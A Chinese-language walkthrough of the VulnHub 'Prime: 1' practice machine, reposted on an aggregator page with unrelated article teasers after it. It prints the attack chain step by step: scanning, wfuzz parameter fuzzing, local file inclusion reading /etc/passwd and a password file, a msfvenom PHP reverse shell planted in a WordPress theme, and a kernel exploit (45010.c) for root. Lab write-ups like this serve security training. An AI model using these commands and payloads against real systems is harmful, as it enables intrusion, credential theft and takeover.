prime_series_level-1靶场详解

环境搭建

官网https://www.vulnhub.com/entry/prime-1,358/

直接导入靶机

解题思路

arp-scan -l

确认靶机ip为192.168.236.136

也可以使用nmap扫网段

nmap -sn 192.168.236.0/24

使用nmap扫描靶机开放的端口

nmap -sS -T5 --min-rate 10000 192.168.236.136 -sC -p- (速度较快,内容少)我习惯性这个

nmap -A -sV -T4 -p- 192.168.236.136 内容较多,速度慢

开放了22和80端口

访问80端口,查看源码也没有任何信息

使用dirb扫描目录

当然还可以使用御剑,dirsearch等

dirb http://192.168.236.136/

访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress

访问wordpress

尝试过滤扫描dirb http://192.168.236.136 -X .txt,.php,zip

 

尝试访问这三个文件:index.php,image.php,secret.txt

提示说要找到location.txt才能进行下一步

使用wfuzz工具爆破传参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.136/index.php?FUZZ

发现长度宽度都一样

使用wfuzz过滤出不同的值

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.236.136/index.php?FUZZ

直接访问/index.php?file=location.txt

curl http://192.168.236.136/index.php?file=location.txt

提示显示:secrettier360是正确的参数,file只是过渡而已

尝试curl http://192.168.236.136/index.php?secrettier360=aaa

curl http://192.168.236.136/image.php?secrettier360=aaa试试

提示说找到了正确的参数

使用curl http://192.168.236.136/image.php?secrettier360=/etc/passwd读取敏感文件

后面提示说找password.txt,并且在/home/saket里面

刚才只扫到一个index.php和一个image.php所以这里只能利用image.php

使用curl http://192.168.236.136/image.php?secrettier360=/home/saket/password.txt

给了一串特殊字符follow_the_ippsec猜测是密码

尝试ssh登录:ssh -p 22 victor@192.168.236.136

ssh登录失败,尝试其他登录方式

使用前面扫描出来的wordpress登录试试

使用cmseek搜集web指纹信息

cmseek -u http://192.168.236.136/wordpress/

或者使用wpscan扫描wordpress

wpscan --url http://192.168.236.136/wordpress/ --enumerate u

显示只有一个用户victor

登录wordpress

登录成功

找后门上传点

利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=7777 -o shell.php
      -p选择相应payload
      lhost=本地IP
      lport=监听端口
      -o 指定输出文件的位置

将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。

要和生成的payload对应一致

使用msfconsole

使用监听模块 use exploit/multi/handler

跟之前生成payload的对应 set payload php/meterpreter/reverse_tcp

设置自己ip set lhost 192.168.236.128

设置端口 set lport 7777

开始监听 run和exploit都可以

让网站触发这个php反弹shell

访问这个文件

wordpress文件都在这个路径下

http://192.168.236.136/wordpress/wp-content/themes/twentynineteen/secret.php

打开msfconsole查看漏洞数据库

使用searchsploit 16.04 Ubuntu查找

发现只有这个符合,并且给了提权脚本

在msf数据漏洞库下载45010.c的提权脚本

msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local

将脚本copy下来,使用gcc编译

上传45010

upload /root/45010(本机文件) /tmp/45010(靶机root目录)

发现版本报错glibc的版本不对(glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc)

两个方法,要么kali下载对应版本(主要是我kali刚刚更新) ,要么升级Ubuntu的glibc版本(本来就是渗透进去的)

我选择第三种方法,找一个以前版本的kali 2021,就可以解决了。

查看root下的root.txt文件得到flag

知识点:

1、扫描局域网内的网段主机

2、扫描端口获得运行的服务

3、扫描目录获得关键信息

4、本地文件包含漏洞LF刊

5、fuzz获得正确的参数

6、wordpress漏洞利用

7、msfvenom:生成反弹shell

8、Ubuntu内核漏洞提权

内网渗透思路框架图_内网渗透路线图-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/410192.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

BioVendor PEDF Human ELISA试剂盒

PEDF首先被发现是由人胎儿视网膜色素上皮细胞合成并释放到光感受器基质中的。它定位于人类染色体17p。PEDF是一种50 kDa多功能糖蛋白,属于丝氨酸蛋白酶抑制剂超基因(serpin)家族,作用类似丝氨酸蛋白酶的底物而不是抑制剂,也被描述为丝氨酸肽酶…

力扣模板题:回文链表

请牢记检测回文串的模板 /*** Definition for singly-linked list.* struct ListNode {* int val;* struct ListNode *next;* };*/ bool isPalindrome(struct ListNode* head) {int size0;struct ListNode* pointhead;while(point){size;pointpoint->next;}int arr…

遭遇DDOS攻击忍气吞声?立刻报警!首都网警重拳出击,犯罪分子无所遁形

遭遇DDOS攻击忍气吞声?立刻报警!首都网警重拳出击 公元2024年2月24日18时许,笔者的个人网站突然遭遇不明身份者的DDOS攻击,且攻击流量已超过阿里云DDos基础防护的黑洞阈值,服务器的所有公网访问已被屏蔽,由…

高效项目计划的关键因素:制定前必须要考虑的事项

制定项目计划前需要考虑哪些因素?项目计划是一份重要的文件,它概述了项目的范围、目标、时间表、资源和预算。它作为项目团队和涉众的路线图,帮助每个人在整个项目生命周期中保持一致。在本文中我们将概述如何制定合理的项目计划。 1、定义项…

4.4 MySQL存储

目录 1、使用前提 2、使用连接数据库最初步骤 2.1 最初步骤 2.2 connect()方法中参数简单传递 3、创建数据库(创建架构)和创建表 3.1 创建数据库(创建架构) 3.2 创建表 3.2.1 基本创建 3.2.2 创建自增主键 4、Pycharm 可视化连接 MySQL 图形界面 5、插入、更新、查询…

centos升级g++.v6.1.0版本

1.下载源码包 wget http://ftp.gnu.org/gnu/gcc/gcc-6.1.0/gcc-6.1.0.tar.gz tar -zxvf gcc-6.1.0.tar.gz cd gcc-6.1.0 2.打开 download_prerequisites 脚本 vim contrib/download_prerequisites 可以看到该文件就是执行一些下载指令,需要下载几个包&#xff0c…

适合新手博主站长使用的免费响应式WordPress博客主题JianYue

这款JianYue主题之所以命名为 JianYue,意思就是简单而不简约的。是根据Blogs主题优化而成,剔除了一些不必要的功能及排版,仅保留一种博客布局,让新手站长能够快速手上WordPress。可以说这款主题比较适合新手博主站长使用&#xff…

数字化转型导师坚鹏:省级政府数字化转型案例研究

省级政府数字化转型案例研究 课程背景: 很多省级政府存在以下问题: 不清楚省级政府数字化转型的政务服务类成功案例 不清楚省级政府数字化转型的社会管理类成功案例 不清楚省级政府数字化转型的数字机关类成功案例 不清楚省级政府数字化转型的…

比创达元启新程 共创新佳绩:2023年度总结暨迎新年晚会圆满收官!

新的一年,万象更新。回顾2023年,我们携手走过的岁月,喜悦伴着汗水,成功伴着艰辛,遗憾激励奋斗。在过去的一年时间里,每个行业都经历着前所未有的变革与困难。我们比创达人也凭借着人心齐泰山移的团结之力&a…

智能SQL生成:后端技术与LLM的完美结合

文章目录 引言一、什么是大模型二、为什么选择LLM三、开发技术说明四、系统架构说明五、编码实战1. Maven2. 讯飞大模型配置类3. LLM相关的封装4. 编写LLM的service5. 编写controller6. 运行测试 六、总结 引言 本篇文章主要是关于实现一个类似Chat2DB的根据自然语言生成SQL的…

产品经理应该具备的基本意识(3)团灭意识(字幕)

1 00:00:01,040 --> 00:00:02,440 下一个基本意识 2 00:00:02,450 --> 00:00:05,310 我们就要有一个团灭意识 3 00:00:06,320 --> 00:00:09,070 我们在软件方法第二章的时候也说过 4 00:00:09,080 --> 00:00:11,580 就是说,我们做需求的时候 5 00:0…

【Java程序设计】【C00307】基于Springboot的基Hadoop的物品租赁管理系统(有论文)

基于Springboot的基Hadoop的物品租赁管理系统(有论文) 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于Springboot的基于 Hadoop的物品租赁系统的设计与实现,本系统有管理员、用户二种角色权限; 前台首页&#…

输电线路微波覆冰监测装置助力电网应对新一轮寒潮

2月19日起,湖南迎来新一轮寒潮雨雪冰冻天气。为做好安全可靠的供电准备,国网国网湘潭供电公司迅速启动雨雪、覆冰预警应急响应,采取“人巡机巡可视化巡视”的方式,对输电线路实施三维立体巡检。该公司组织员工对1324套通道可视化装…

[力扣 Hot100]Day38 翻转二叉树

题目描述 给你一棵二叉树的根节点 root ,翻转这棵二叉树,并返回其根节点。 出处 思路 先序遍历,无脑翻转。 代码 class Solution { private:void invert(TreeNode* root){if(!root) return;TreeNode* p root->left;root->left …

自动化部署证书 acme.sh 使用教程

简介 acme.sh 是一个开源的 ACME 协议的客户端工具,用于自动化申请、更新和部署 SSL/TLS 证书。通过使用 acme.sh,用户可以轻松地在服务器上设置 HTTPS 加密连接,而无需手动操作。它支持多种 DNS 接口和证书颁发机构,可以与各种 …

逆向茶话会笔记

安卓逆向 用用burp设置代理或者用charles抓包 windows httpopen 类比web站点渗透测试 推荐书 飞虫 安卓大佬不怎么打ctf 喜欢在看雪和吾爱破解 提问环节 q websocket grpc抓包有什么推荐的工具? a 不太了解 游戏安全和llvm 既要逆游戏也要逆外挂 逆游戏入…

机器学习——线性代数中矩阵和向量的基本介绍

矩阵和向量的基本概念 矩阵的基本概念(这里不多说,应该都知道) 而向量就是一个特殊的矩阵,即向量只有一列,是个n*1的矩阵 注:一般矩阵用大写字母表示,向量用小写字母表示 矩阵的加减运算 两个…

SpringCloud-Docker原理解析

Spring Cloud和Docker的结合为微服务架构的部署和管理提供了强大的支持。本文深入剖析Spring Cloud与Docker的集成原理,从服务注册与发现、配置管理、负载均衡到容器化部署等方面展开详细解析。探讨Spring Cloud如何利用Docker容器技术实现服务的弹性伸缩&#xff0…

GitHub上的GCN

在GitHub上下载GCN代码,可以跑通 https://github.com/tkipf/pygcn

力扣用例题:2的幂

此题的解题方法在于根据用例调整代码 bool isPowerOfTwo(int n) {if(n1){return true;}if(n<0){return false;}while(n>2){if(n%21){return false;}nn/2; }if(n1){return false;}return true;}